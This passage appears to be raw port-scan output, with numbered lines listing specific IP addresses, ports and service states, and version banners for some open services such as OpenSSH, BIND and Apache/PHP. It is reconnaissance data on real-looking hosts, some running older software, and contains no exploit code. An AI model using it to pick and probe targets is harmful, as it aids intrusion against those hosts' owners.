8619174.142.53.51 68 tcp dhcpc filtered
8620174.142.53.51 68 udp dhcpc unknown
8621174.142.53.51 69 tcp tftp filtered
8622174.142.53.51 69 udp tftp unknown
8623174.142.53.51 88 tcp kerberos-sec filtered
8624174.142.53.51 88 udp kerberos-sec unknown
8625174.142.53.51 123 tcp ntp filtered
8626174.142.53.51 123 udp ntp unknown
8627174.142.53.51 137 tcp netbios-ns filtered
8628174.142.53.51 137 udp netbios-ns filtered
8629174.142.53.51 138 tcp netbios-dgm filtered
8630174.142.53.51 138 udp netbios-dgm filtered
8631174.142.53.51 139 tcp netbios-ssn closed
8632174.142.53.51 139 udp netbios-ssn unknown
8633174.142.53.51 161 tcp snmp filtered
8634174.142.53.51 161 udp snmp unknown
8635174.142.53.51 162 tcp snmptrap filtered
8636174.142.53.51 162 udp snmptrap unknown
8637174.142.53.51 389 tcp ldap filtered
8638174.142.53.51 389 udp ldap unknown
8639174.142.53.51 445 tcp microsoft-ds closed
8640174.142.53.51 520 tcp efs filtered
8641174.142.53.51 520 udp route unknown
8642174.142.53.51 2049 tcp nfs filtered
8643174.142.53.51 2049 udp nfs unknown
8644190.98.209.37 53 tcp domain filtered
8645190.98.209.37 53 udp domain unknown
8646190.98.209.37 67 tcp dhcps filtered
8647190.98.209.37 67 udp dhcps unknown
8648190.98.209.37 68 tcp dhcpc filtered
8649190.98.209.37 68 udp dhcpc unknown
8650190.98.209.37 69 tcp tftp filtered
8651190.98.209.37 69 udp tftp unknown
8652190.98.209.37 88 tcp kerberos-sec filtered
8653190.98.209.37 88 udp kerberos-sec unknown
8654190.98.209.37 123 tcp ntp filtered
8655190.98.209.37 123 udp ntp unknown
8656190.98.209.37 137 tcp netbios-ns filtered
8657190.98.209.37 137 udp netbios-ns unknown
8658190.98.209.37 138 tcp netbios-dgm filtered
8659190.98.209.37 138 udp netbios-dgm unknown
8660190.98.209.37 139 tcp netbios-ssn filtered
8661190.98.209.37 139 udp netbios-ssn unknown
8662190.98.209.37 161 tcp snmp filtered
8663190.98.209.37 161 udp snmp unknown
8664190.98.209.37 162 tcp snmptrap filtered
8665190.98.209.37 162 udp snmptrap unknown
8666190.98.209.37 389 tcp ldap filtered
8667190.98.209.37 389 udp ldap unknown
8668190.98.209.37 520 tcp efs filtered
8669190.98.209.37 520 udp route unknown
8670190.98.209.37 2049 tcp nfs filtered
8671190.98.209.37 2049 udp nfs unknown
8672190.153.209.187 53 tcp domain filtered
8673190.153.209.187 53 udp domain unknown
8674190.153.209.187 67 tcp dhcps filtered
8675190.153.209.187 67 udp dhcps unknown
8676190.153.209.187 68 tcp dhcpc filtered
8677190.153.209.187 68 udp dhcpc unknown
8678190.153.209.187 69 tcp tftp filtered
8679190.153.209.187 69 udp tftp unknown
8680190.153.209.187 88 tcp kerberos-sec filtered
8681190.153.209.187 88 udp kerberos-sec unknown
8682190.153.209.187 123 tcp ntp filtered
8683190.153.209.187 123 udp ntp unknown
8684190.153.209.187 137 tcp netbios-ns filtered
8685190.153.209.187 137 udp netbios-ns unknown
8686190.153.209.187 138 tcp netbios-dgm filtered
8687190.153.209.187 138 udp netbios-dgm unknown
8688190.153.209.187 139 tcp netbios-ssn filtered
8689190.153.209.187 139 udp netbios-ssn unknown
8690190.153.209.187 161 tcp snmp filtered
8691190.153.209.187 161 udp snmp unknown
8692190.153.209.187 162 tcp snmptrap filtered
8693190.153.209.187 162 udp snmptrap unknown
8694190.153.209.187 389 tcp ldap filtered
8695190.153.209.187 389 udp ldap unknown
8696190.153.209.187 520 tcp efs filtered
8697190.153.209.187 520 udp route unknown
8698190.153.209.187 2049 tcp nfs filtered
8699190.153.209.187 2049 udp nfs unknown
8700190.153.219.254 22 tcp ssh open SSH-2.0-OpenSSH_7.4
8701190.153.219.254 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8702190.153.219.254 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8703190.153.219.254 67 tcp dhcps filtered
8704190.153.219.254 67 udp dhcps unknown
8705190.153.219.254 68 tcp dhcpc filtered
8706190.153.219.254 68 udp dhcpc unknown
8707190.153.219.254 69 tcp tftp filtered
8708190.153.219.254 69 udp tftp unknown
8709190.153.219.254 88 tcp kerberos-sec filtered
8710190.153.219.254 88 udp kerberos-sec unknown
8711190.153.219.254 123 tcp ntp filtered
8712190.153.219.254 123 udp ntp unknown
8713190.153.219.254 137 tcp netbios-ns filtered
8714190.153.219.254 137 udp netbios-ns unknown
8715190.153.219.254 138 tcp netbios-dgm filtered
8716190.153.219.254 138 udp netbios-dgm unknown
8717190.153.219.254 139 tcp netbios-ssn filtered
8718190.153.219.254 139 udp netbios-ssn unknown
8719190.153.219.254 161 tcp snmp filtered
8720190.153.219.254 161 udp snmp unknown
8721190.153.219.254 162 tcp snmptrap filtered
8722190.153.219.254 162 udp snmptrap unknown
8723190.153.219.254 389 tcp ldap filtered
8724190.153.219.254 389 udp ldap unknown
8725190.153.219.254 520 tcp efs filtered
8726190.153.219.254 520 udp route unknown
8727190.153.219.254 2049 tcp nfs filtered
8728190.153.219.254 2049 udp nfs unknown
8729200.73.54.34 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
8730200.73.54.34 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
8731200.73.54.34 67 tcp dhcps filtered
8732200.73.54.34 67 udp dhcps unknown
8733200.73.54.34 68 tcp dhcpc filtered
8734200.73.54.34 68 udp dhcpc unknown
8735200.73.54.34 69 tcp tftp filtered
8736200.73.54.34 69 udp tftp unknown
8737200.73.54.34 88 tcp kerberos-sec filtered
8738200.73.54.34 88 udp kerberos-sec unknown
8739200.73.54.34 123 tcp ntp filtered
8740200.73.54.34 123 udp ntp unknown
8741200.73.54.34 137 tcp netbios-ns filtered
8742200.73.54.34 137 udp netbios-ns unknown
8743200.73.54.34 138 tcp netbios-dgm filtered
8744200.73.54.34 138 udp netbios-dgm unknown
8745200.73.54.34 139 tcp netbios-ssn filtered
8746200.73.54.34 139 udp netbios-ssn unknown
8747200.73.54.34 161 tcp snmp filtered
8748200.73.54.34 161 udp snmp unknown
8749200.73.54.34 162 tcp snmptrap filtered
8750200.73.54.34 162 udp snmptrap unknown
8751200.73.54.34 389 tcp ldap filtered
8752200.73.54.34 389 udp ldap unknown
8753200.73.54.34 520 tcp efs filtered
8754200.73.54.34 520 udp route unknown
8755200.73.54.34 2049 tcp nfs filtered
8756200.73.54.34 2049 udp nfs unknown
8757204.93.193.141 21 tcp ftp open Your connection to this server has been blocked.\x0d\x0a\x0d\x0aYou are most likely being blocked due to use of incorrect user/pass combination. Please, check all of your computers/devices to make sure that they are using the correct login credentials, including your email clients. You may also get blocked due to too many POP3/IMAP logins in 1 minute interval, please adjust your email client settings.\x0d\x0a
8758204.93.193.141 53 tcp domain filtered
8759204.93.193.141 53 udp domain unknown
8760204.93.193.141 67 tcp dhcps filtered
8761204.93.193.141 67 udp dhcps unknown
8762204.93.193.141 68 tcp dhcpc filtered
8763204.93.193.141 68 udp dhcpc unknown
8764204.93.193.141 69 tcp tftp filtered
8765204.93.193.141 69 udp tftp unknown
8766204.93.193.141 88 tcp kerberos-sec filtered
8767204.93.193.141 88 udp kerberos-sec unknown
8768204.93.193.141 123 tcp ntp filtered
8769204.93.193.141 123 udp ntp unknown
8770204.93.193.141 137 tcp netbios-ns filtered
8771204.93.193.141 137 udp netbios-ns unknown
8772204.93.193.141 138 tcp netbios-dgm filtered
8773204.93.193.141 138 udp netbios-dgm unknown
8774204.93.193.141 139 tcp netbios-ssn filtered
8775204.93.193.141 139 udp netbios-ssn unknown
8776204.93.193.141 161 tcp snmp filtered
8777204.93.193.141 161 udp snmp unknown
8778204.93.193.141 162 tcp snmptrap filtered
8779204.93.193.141 162 udp snmptrap unknown
8780204.93.193.141 389 tcp ldap filtered
8781204.93.193.141 389 udp ldap unknown
8782204.93.193.141 520 tcp efs filtered
8783204.93.193.141 520 udp route unknown
8784204.93.193.141 2049 tcp nfs filtered
8785204.93.193.141 2049 udp nfs unknown
8786206.48.140.40 53 tcp domain filtered
8787206.48.140.40 53 udp domain unknown
8788206.48.140.40 67 tcp dhcps filtered
8789206.48.140.40 67 udp dhcps unknown
8790206.48.140.40 68 tcp dhcpc filtered
8791206.48.140.40 68 udp dhcpc unknown
8792206.48.140.40 69 tcp tftp filtered
8793206.48.140.40 69 udp tftp unknown
8794206.48.140.40 88 tcp kerberos-sec filtered
8795206.48.140.40 88 udp kerberos-sec unknown
8796206.48.140.40 123 tcp ntp filtered
8797206.48.140.40 123 udp ntp unknown
8798206.48.140.40 137 tcp netbios-ns filtered
8799206.48.140.40 137 udp netbios-ns unknown
8800206.48.140.40 138 tcp netbios-dgm filtered
8801206.48.140.40 138 udp netbios-dgm unknown
8802206.48.140.40 139 tcp netbios-ssn filtered
8803206.48.140.40 139 udp netbios-ssn unknown
8804206.48.140.40 161 tcp snmp filtered
8805206.48.140.40 161 udp snmp unknown
8806206.48.140.40 162 tcp snmptrap filtered
8807206.48.140.40 162 udp snmptrap unknown
8808206.48.140.40 389 tcp ldap filtered
8809206.48.140.40 389 udp ldap unknown
8810206.48.140.40 520 tcp efs filtered
8811206.48.140.40 520 udp route unknown
8812206.48.140.40 2049 tcp nfs filtered
8813206.48.140.40 2049 udp nfs unknown
8814207.246.147.189 53 tcp domain filtered
8815207.246.147.189 53 udp domain unknown
8816207.246.147.189 67 tcp dhcps filtered
8817207.246.147.189 67 udp dhcps unknown
8818207.246.147.189 68 tcp dhcpc filtered
8819207.246.147.189 68 udp dhcpc unknown
8820207.246.147.189 69 tcp tftp filtered
8821207.246.147.189 69 udp tftp unknown
8822207.246.147.189 80 tcp http open nginx
8823207.246.147.189 88 tcp kerberos-sec filtered
8824207.246.147.189 88 udp kerberos-sec unknown
8825207.246.147.189 123 tcp ntp filtered
8826207.246.147.189 123 udp ntp unknown
8827207.246.147.189 137 tcp netbios-ns filtered
8828207.246.147.189 137 udp netbios-ns unknown
8829207.246.147.189 138 tcp netbios-dgm filtered
8830207.246.147.189 138 udp netbios-dgm unknown
8831207.246.147.189 139 tcp netbios-ssn filtered
8832207.246.147.189 139 udp netbios-ssn unknown
8833207.246.147.189 161 tcp snmp filtered
8834207.246.147.189 161 udp snmp unknown
8835207.246.147.189 162 tcp snmptrap filtered
8836207.246.147.189 162 udp snmptrap unknown
8837207.246.147.189 389 tcp ldap filtered
8838207.246.147.189 389 udp ldap unknown
8839207.246.147.189 443 tcp ssl/http open nginx
8840207.246.147.189 520 tcp efs filtered
8841207.246.147.189 520 udp route unknown
8842207.246.147.189 2049 tcp nfs filtered
8843207.246.147.189 2049 udp nfs unknown
8844207.246.147.190 53 tcp domain filtered
8845207.246.147.190 53 udp domain unknown
8846207.246.147.190 67 tcp dhcps filtered
8847207.246.147.190 67 udp dhcps unknown
8848207.246.147.190 68 tcp dhcpc filtered
8849207.246.147.190 68 udp dhcpc unknown
8850207.246.147.190 69 tcp tftp filtered
8851207.246.147.190 69 udp tftp unknown
8852207.246.147.190 80 tcp http open nginx
8853207.246.147.190 88 tcp kerberos-sec filtered
8854207.246.147.190 88 udp kerberos-sec unknown
8855207.246.147.190 123 tcp ntp filtered
8856207.246.147.190 123 udp ntp unknown
8857207.246.147.190 137 tcp netbios-ns filtered
8858207.246.147.190 137 udp netbios-ns unknown
8859207.246.147.190 138 tcp netbios-dgm filtered
8860207.246.147.190 138 udp netbios-dgm filtered
8861207.246.147.190 139 tcp netbios-ssn filtered
8862207.246.147.190 139 udp netbios-ssn unknown
8863207.246.147.190 161 tcp snmp filtered
8864207.246.147.190 161 udp snmp unknown
8865207.246.147.190 162 tcp snmptrap filtered
8866207.246.147.190 162 udp snmptrap unknown
8867207.246.147.190 389 tcp ldap filtered
8868207.246.147.190 389 udp ldap unknown
8869207.246.147.190 443 tcp ssl/http open nginx
8870207.246.147.190 520 tcp efs filtered
8871207.246.147.190 520 udp route unknown
8872207.246.147.190 2049 tcp nfs filtered
8873207.246.147.190 2049 udp nfs unknown
8874207.246.147.247 53 tcp domain filtered
8875207.246.147.247 53 udp domain filtered
8876207.246.147.247 67 tcp dhcps filtered
8877207.246.147.247 67 udp dhcps unknown
8878207.246.147.247 68 tcp dhcpc filtered
8879207.246.147.247 68 udp dhcpc unknown
8880207.246.147.247 69 tcp tftp filtered
8881207.246.147.247 69 udp tftp unknown
8882207.246.147.247 80 tcp http open nginx
8883207.246.147.247 88 tcp kerberos-sec filtered
8884207.246.147.247 88 udp kerberos-sec unknown
8885207.246.147.247 123 tcp ntp filtered
8886207.246.147.247 123 udp ntp unknown
8887207.246.147.247 137 tcp netbios-ns filtered
8888207.246.147.247 137 udp netbios-ns filtered
8889207.246.147.247 138 tcp netbios-dgm filtered
8890207.246.147.247 138 udp netbios-dgm unknown
8891207.246.147.247 139 tcp netbios-ssn filtered
8892207.246.147.247 139 udp netbios-ssn unknown
8893207.246.147.247 161 tcp snmp filtered
8894207.246.147.247 161 udp snmp unknown
8895207.246.147.247 162 tcp snmptrap filtered
8896207.246.147.247 162 udp snmptrap unknown
8897207.246.147.247 389 tcp ldap filtered
8898207.246.147.247 389 udp ldap unknown
8899207.246.147.247 443 tcp ssl/http open nginx
8900207.246.147.247 520 tcp efs filtered
8901207.246.147.247 520 udp route unknown
8902207.246.147.247 2049 tcp nfs filtered
8903207.246.147.247 2049 udp nfs unknown
8904207.246.147.248 53 tcp domain filtered
8905207.246.147.248 53 udp domain unknown
8906207.246.147.248 67 tcp dhcps filtered
8907207.246.147.248 67 udp dhcps unknown
8908207.246.147.248 68 tcp dhcpc filtered
8909207.246.147.248 68 udp dhcpc unknown
8910207.246.147.248 69 tcp tftp filtered
8911207.246.147.248 69 udp tftp unknown
8912207.246.147.248 80 tcp http open nginx
8913207.246.147.248 88 tcp kerberos-sec filtered
8914207.246.147.248 88 udp kerberos-sec unknown
8915207.246.147.248 123 tcp ntp filtered
8916207.246.147.248 123 udp ntp unknown
8917207.246.147.248 137 tcp netbios-ns filtered
8918207.246.147.248 137 udp netbios-ns unknown
8919207.246.147.248 138 tcp netbios-dgm filtered
8920207.246.147.248 138 udp netbios-dgm unknown
8921207.246.147.248 139 tcp netbios-ssn filtered
8922207.246.147.248 139 udp netbios-ssn unknown
8923207.246.147.248 161 tcp snmp filtered
8924207.246.147.248 161 udp snmp unknown
8925207.246.147.248 162 tcp snmptrap filtered
8926207.246.147.248 162 udp snmptrap unknown
8927207.246.147.248 389 tcp ldap filtered
8928207.246.147.248 389 udp ldap unknown
8929207.246.147.248 443 tcp ssl/http open nginx
8930207.246.147.248 520 tcp efs filtered
8931207.246.147.248 520 udp route unknown
8932207.246.147.248 2049 tcp nfs filtered
8933207.246.147.248 2049 udp nfs unknown
8934211.13.196.135 25 tcp smtp closed
8935211.13.196.135 53 tcp domain filtered
8936211.13.196.135 53 udp domain unknown
8937211.13.196.135 67 tcp dhcps filtered
8938211.13.196.135 67 udp dhcps unknown
8939211.13.196.135 68 tcp dhcpc filtered
8940211.13.196.135 68 udp dhcpc unknown
8941211.13.196.135 69 tcp tftp filtered
8942211.13.196.135 69 udp tftp unknown
8943211.13.196.135 80 tcp http open Apache httpd
8944211.13.196.135 88 tcp kerberos-sec filtered
8945211.13.196.135 88 udp kerberos-sec unknown
8946211.13.196.135 113 tcp ident closed
8947211.13.196.135 123 tcp ntp filtered
8948211.13.196.135 123 udp ntp unknown
8949211.13.196.135 137 tcp netbios-ns filtered
8950211.13.196.135 137 udp netbios-ns filtered
8951211.13.196.135 138 tcp netbios-dgm filtered
8952211.13.196.135 138 udp netbios-dgm filtered
8953211.13.196.135 139 tcp netbios-ssn closed
8954211.13.196.135 139 udp netbios-ssn unknown
8955211.13.196.135 161 tcp snmp filtered
8956211.13.196.135 161 udp snmp unknown
8957211.13.196.135 162 tcp snmptrap filtered
8958211.13.196.135 162 udp snmptrap unknown
8959211.13.196.135 389 tcp ldap filtered
8960211.13.196.135 389 udp ldap unknown
8961211.13.196.135 443 tcp ssl/http open Apache httpd
8962211.13.196.135 445 tcp microsoft-ds closed
8963211.13.196.135 520 tcp efs filtered
8964211.13.196.135 520 udp route unknown
8965211.13.196.135 2049 tcp nfs filtered
8966211.13.196.135 2049 udp nfs unknown
8967218.45.5.97 25 tcp smtp closed
8968218.45.5.97 53 tcp domain filtered
8969218.45.5.97 53 udp domain unknown
8970218.45.5.97 67 tcp dhcps filtered
8971218.45.5.97 67 udp dhcps unknown
8972218.45.5.97 68 tcp dhcpc filtered
8973218.45.5.97 68 udp dhcpc unknown
8974218.45.5.97 69 tcp tftp filtered
8975218.45.5.97 69 udp tftp unknown
8976218.45.5.97 80 tcp http open Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.15
8977218.45.5.97 88 tcp kerberos-sec filtered
8978218.45.5.97 88 udp kerberos-sec unknown
8979218.45.5.97 113 tcp ident closed
8980218.45.5.97 123 tcp ntp filtered
8981218.45.5.97 123 udp ntp unknown
8982218.45.5.97 137 tcp netbios-ns filtered
8983218.45.5.97 137 udp netbios-ns filtered
8984218.45.5.97 138 tcp netbios-dgm filtered
8985218.45.5.97 138 udp netbios-dgm filtered
8986218.45.5.97 139 tcp netbios-ssn closed
8987218.45.5.97 139 udp netbios-ssn unknown
8988218.45.5.97 161 tcp snmp filtered
8989218.45.5.97 161 udp snmp unknown
8990218.45.5.97 162 tcp snmptrap filtered
8991218.45.5.97 162 udp snmptrap unknown
8992218.45.5.97 389 tcp ldap filtered
8993218.45.5.97 389 udp ldap unknown
8994218.45.5.97 443 tcp ssl/http open Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.15
8995218.45.5.97 445 tcp microsoft-ds closed
8996218.45.5.97 520 tcp efs filtered
8997218.45.5.97 520 udp route unknown
8998218.45.5.97 2049 tcp nfs filtered
8999218.45.5.97 2049 udp nfs unknown
9000
9001
9002149.126.72.220 1366 tcp tcpwrapped open
9003149.126.72.220 1377 tcp tcpwrapped open
9004149.126.72.220 1387 tcp tcpwrapped open
9005149.126.72.220 1388 tcp tcpwrapped open
9006149.126.72.220 1433 tcp tcpwrapped open
9007149.126.72.220 1443 tcp tcpwrapped open
9008149.126.72.220 1447 tcp tcpwrapped open
9009149.126.72.220 1450 tcp tcpwrapped open
9010149.126.72.220 1451 tcp tcpwrapped open
9011149.126.72.220 1452 tcp tcpwrapped open
9012149.126.72.220 1453 tcp tcpwrapped open
9013149.126.72.220 1454 tcp tcpwrapped open
9014149.126.72.220 1455 tcp tcpwrapped open
9015149.126.72.220 1456 tcp tcpwrapped open
9016149.126.72.220 1457 tcp tcpwrapped open
9017149.126.72.220 1458 tcp tcpwrapped open
9018149.126.72.220 1459 tcp tcpwrapped open
9019149.126.72.220 1460 tcp tcpwrapped open
9020149.126.72.220 1494 tcp tcpwrapped open
9021149.126.72.220 1935 tcp tcpwrapped open
9022149.126.72.220 1950 tcp tcpwrapped open
9023149.126.72.220 1951 tcp tcpwrapped open
9024149.126.72.220 1952 tcp tcpwrapped open
9025149.126.72.220 1953 tcp tcpwrapped open
9026149.126.72.220 1954 tcp tcpwrapped open
9027149.126.72.220 1955 tcp tcpwrapped open
9028149.126.72.220 1956 tcp tcpwrapped open
9029149.126.72.220 1957 tcp tcpwrapped open
9030149.126.72.220 1958 tcp tcpwrapped open
9031149.126.72.220 1959 tcp tcpwrapped open
9032149.126.72.220 1960 tcp tcpwrapped open
9033149.126.72.220 1964 tcp tcpwrapped open
9034149.126.72.220 1965 tcp tcpwrapped open
9035149.126.72.220 1966 tcp tcpwrapped open
9036149.126.72.220 1967 tcp tcpwrapped open
9037149.126.72.220 1968 tcp tcpwrapped open
9038149.126.72.220 1969 tcp tcpwrapped open
9039149.126.72.220 1970 tcp tcpwrapped open
9040149.126.72.220 1971 tcp tcpwrapped open
9041149.126.72.220 1972 tcp tcpwrapped open
9042149.126.72.220 1973 tcp tcpwrapped open
9043149.126.72.220 1974 tcp tcpwrapped open
9044149.126.72.220 1975 tcp tcpwrapped open
9045149.126.72.220 1976 tcp tcpwrapped open
9046149.126.72.220 1977 tcp tcpwrapped open
9047149.126.72.220 1978 tcp tcpwrapped open
9048149.126.72.220 1979 tcp tcpwrapped open
9049149.126.72.220 1980 tcp tcpwrapped open
9050149.126.72.220 1981 tcp tcpwrapped open
9051149.126.72.220 1982 tcp tcpwrapped open
9052149.126.72.220 1983 tcp tcpwrapped open
9053149.126.72.220 1984 tcp tcpwrapped open
9054149.126.72.220 1985 tcp tcpwrapped open
9055149.126.72.220 1986 tcp tcpwrapped open
9056149.126.72.220 1987 tcp tcpwrapped open
9057149.126.72.220 1988 tcp tcpwrapped open
9058149.126.72.220 1989 tcp tcpwrapped open
9059149.126.72.220 2000 tcp tcpwrapped open
9060149.126.72.220 2001 tcp tcpwrapped open
9061149.126.72.220 2006 tcp tcpwrapped open
9062149.126.72.220 2012 tcp tcpwrapped open
9063149.126.72.220 2020 tcp tcpwrapped open
9064149.126.72.220 2048 tcp tcpwrapped open
9065149.126.72.220 2049 tcp http open Incapsula CDN httpd
9066149.126.72.220 2049 udp nfs unknown
9067149.126.72.220 2050 tcp tcpwrapped open
9068149.126.72.220 2051 tcp tcpwrapped open
9069149.126.72.220 2052 tcp tcpwrapped open
9070149.126.72.220 2053 tcp tcpwrapped open
9071149.126.72.220 2054 tcp tcpwrapped open
9072149.126.72.220 2055 tcp tcpwrapped open
9073149.126.72.220 2056 tcp tcpwrapped open
9074149.126.72.220 2057 tcp tcpwrapped open
9075149.126.72.220 2058 tcp tcpwrapped open
9076149.126.72.220 2059 tcp tcpwrapped open
9077149.126.72.220 2060 tcp tcpwrapped open
9078149.126.72.220 2061 tcp tcpwrapped open
9079149.126.72.220 2062 tcp tcpwrapped open
9080149.126.72.220 2063 tcp tcpwrapped open
9081149.126.72.220 2064 tcp tcpwrapped open
9082149.126.72.220 2065 tcp tcpwrapped open
9083149.126.72.220 2066 tcp tcpwrapped open
9084149.126.72.220 2067 tcp tcpwrapped open
9085149.126.72.220 2068 tcp tcpwrapped open
9086149.126.72.220 2069 tcp tcpwrapped open
9087149.126.72.220 2070 tcp tcpwrapped open
9088149.126.72.220 2072 tcp tcpwrapped open
9089149.126.72.220 2082 tcp tcpwrapped open
9090149.126.72.220 2083 tcp tcpwrapped open
9091149.126.72.220 2087 tcp tcpwrapped open
9092149.126.72.220 2096 tcp tcpwrapped open
9093149.126.72.220 2100 tcp tcpwrapped open
9094149.126.72.220 2108 tcp tcpwrapped open
9095149.126.72.220 2200 tcp tcpwrapped open
9096149.126.72.220 2209 tcp tcpwrapped open
9097149.126.72.220 2222 tcp tcpwrapped open
9098149.126.72.220 2226 tcp tcpwrapped open
9099149.126.72.220 2248 tcp tcpwrapped open
9100149.126.72.220 2344 tcp tcpwrapped open
9101149.126.72.220 2345 tcp tcpwrapped open
9102149.126.72.220 2353 tcp tcpwrapped open
9103149.126.72.220 2363 tcp tcpwrapped open
9104149.126.72.220 2423 tcp tcpwrapped open
9105149.126.72.220 2433 tcp tcpwrapped open
9106149.126.72.220 2435 tcp tcpwrapped open
9107149.126.72.220 2443 tcp tcpwrapped open
9108149.126.72.220 2453 tcp tcpwrapped open
9109149.126.72.220 2480 tcp tcpwrapped open
9110149.126.72.220 2548 tcp tcpwrapped open
9111149.126.72.220 2549 tcp tcpwrapped open
9112149.126.72.220 2550 tcp tcpwrapped open
9113149.126.72.220 2551 tcp tcpwrapped open
9114149.126.72.220 2552 tcp tcpwrapped open
9115149.126.72.220 2553 tcp tcpwrapped open
9116149.126.72.220 2554 tcp tcpwrapped open
9117149.126.72.220 2555 tcp tcpwrapped open
9118149.126.72.220 2556 tcp tcpwrapped open
9119149.126.72.220 2557 tcp tcpwrapped open
9120149.126.72.220 2558 tcp tcpwrapped open
9121149.126.72.220 2559 tcp tcpwrapped open
9122149.126.72.220 2560 tcp tcpwrapped open
9123149.126.72.220 2561 tcp tcpwrapped open
9124149.126.72.220 2562 tcp tcpwrapped open
9125149.126.72.220 2563 tcp tcpwrapped open
9126149.126.72.220 2566 tcp tcpwrapped open
9127149.126.72.220 2567 tcp tcpwrapped open
9128149.126.72.220 2568 tcp tcpwrapped open
9129149.126.72.220 2569 tcp tcpwrapped open
9130149.126.72.220 2570 tcp tcpwrapped open
9131149.126.72.220 2572 tcp tcpwrapped open
9132149.126.72.220 2598 tcp tcpwrapped open
9133149.126.72.220 2599 tcp tcpwrapped open
9134149.126.72.220 2850 tcp tcpwrapped open
9135149.126.72.220 2985 tcp tcpwrapped open
9136149.126.72.220 2995 tcp tcpwrapped open
9137149.126.72.220 3000 tcp tcpwrapped open
9138149.126.72.220 3001 tcp tcpwrapped open
9139149.126.72.220 3002 tcp tcpwrapped open
9140149.126.72.220 3003 tcp tcpwrapped open
9141149.126.72.220 3004 tcp tcpwrapped open
9142149.126.72.220 3005 tcp tcpwrapped open
9143149.126.72.220 3006 tcp tcpwrapped open
9144149.126.72.220 3007 tcp tcpwrapped open
9145149.126.72.220 3008 tcp tcpwrapped open
9146149.126.72.220 3009 tcp tcpwrapped open
9147149.126.72.220 3010 tcp tcpwrapped open
9148149.126.72.220 3011 tcp tcpwrapped open
9149149.126.72.220 3012 tcp tcpwrapped open
9150149.126.72.220 3013 tcp tcpwrapped open
9151149.126.72.220 3014 tcp tcpwrapped open
9152149.126.72.220 3015 tcp tcpwrapped open
9153149.126.72.220 3016 tcp tcpwrapped open
9154149.126.72.220 3017 tcp tcpwrapped open
9155149.126.72.220 3018 tcp tcpwrapped open
9156149.126.72.220 3019 tcp tcpwrapped open
9157149.126.72.220 3020 tcp tcpwrapped open
9158149.126.72.220 3021 tcp tcpwrapped open
9159149.126.72.220 3022 tcp tcpwrapped open
9160149.126.72.220 3030 tcp tcpwrapped open
9161149.126.72.220 3047 tcp tcpwrapped open
9162149.126.72.220 3048 tcp tcpwrapped open
9163149.126.72.220 3049 tcp tcpwrapped open
9164149.126.72.220 3050 tcp tcpwrapped open
9165149.126.72.220 3051 tcp tcpwrapped open
9166149.126.72.220 3052 tcp tcpwrapped open
9167149.126.72.220 3053 tcp tcpwrapped open
9168149.126.72.220 3054 tcp tcpwrapped open
9169149.126.72.220 3055 tcp tcpwrapped open
9170149.126.72.220 3056 tcp tcpwrapped open
9171149.126.72.220 3057 tcp tcpwrapped open
9172149.126.72.220 3058 tcp tcpwrapped open
9173149.126.72.220 3059 tcp tcpwrapped open
9174149.126.72.220 3060 tcp tcpwrapped open
9175149.126.72.220 3061 tcp tcpwrapped open
9176149.126.72.220 3062 tcp tcpwrapped open
9177149.126.72.220 3063 tcp tcpwrapped open
9178149.126.72.220 3064 tcp tcpwrapped open
9179149.126.72.220 3065 tcp tcpwrapped open
9180149.126.72.220 3066 tcp tcpwrapped open
9181149.126.72.220 3067 tcp tcpwrapped open
9182149.126.72.220 3068 tcp tcpwrapped open
9183149.126.72.220 3069 tcp tcpwrapped open
9184149.126.72.220 3070 tcp tcpwrapped open
9185149.126.72.220 3071 tcp tcpwrapped open
9186149.126.72.220 3072 tcp tcpwrapped open
9187149.126.72.220 3073 tcp tcpwrapped open
9188149.126.72.220 3074 tcp tcpwrapped open
9189149.126.72.220 3075 tcp tcpwrapped open
9190149.126.72.220 3076 tcp tcpwrapped open
9191149.126.72.220 3077 tcp tcpwrapped open
9192149.126.72.220 3078 tcp tcpwrapped open
9193149.126.72.220 3079 tcp tcpwrapped open
9194149.126.72.220 3080 tcp tcpwrapped open
9195149.126.72.220 3081 tcp tcpwrapped open
9196149.126.72.220 3082 tcp tcpwrapped open
9197149.126.72.220 3083 tcp tcpwrapped open
9198149.126.72.220 3084 tcp tcpwrapped open
9199149.126.72.220 3085 tcp tcpwrapped open
9200149.126.72.220 3086 tcp tcpwrapped open
9201149.126.72.220 3087 tcp tcpwrapped open
9202149.126.72.220 3088 tcp tcpwrapped open
9203149.126.72.220 3089 tcp tcpwrapped open
9204149.126.72.220 3090 tcp tcpwrapped open
9205149.126.72.220 3091 tcp tcpwrapped open
9206149.126.72.220 3092 tcp tcpwrapped open
9207149.126.72.220 3093 tcp tcpwrapped open
9208149.126.72.220 3094 tcp tcpwrapped open
9209149.126.72.220 3095 tcp tcpwrapped open
9210149.126.72.220 3096 tcp tcpwrapped open
9211149.126.72.220 3097 tcp tcpwrapped open
9212149.126.72.220 3098 tcp tcpwrapped open
9213149.126.72.220 3099 tcp tcpwrapped open
9214149.126.72.220 3100 tcp tcpwrapped open
9215149.126.72.220 3101 tcp tcpwrapped open
9216149.126.72.220 3102 tcp tcpwrapped open
9217149.126.72.220 3103 tcp tcpwrapped open
9218149.126.72.220 3104 tcp tcpwrapped open
9219149.126.72.220 3105 tcp tcpwrapped open
9220149.126.72.220 3106 tcp tcpwrapped open
9221149.126.72.220 3107 tcp tcpwrapped open
9222149.126.72.220 3108 tcp tcpwrapped open
9223149.126.72.220 3109 tcp tcpwrapped open
9224149.126.72.220 3110 tcp tcpwrapped open
9225149.126.72.220 3111 tcp tcpwrapped open
9226149.126.72.220 3112 tcp tcpwrapped open
9227149.126.72.220 3113 tcp tcpwrapped open
9228149.126.72.220 3114 tcp tcpwrapped open
9229149.126.72.220 3115 tcp tcpwrapped open
9230149.126.72.220 3116 tcp tcpwrapped open
9231149.126.72.220 3117 tcp tcpwrapped open
9232149.126.72.220 3118 tcp tcpwrapped open
9233149.126.72.220 3119 tcp tcpwrapped open
9234149.126.72.220 3120 tcp tcpwrapped open
9235149.126.72.220 3121 tcp tcpwrapped open
9236149.126.72.220 3150 tcp tcpwrapped open
9237149.126.72.220 3155 tcp tcpwrapped open
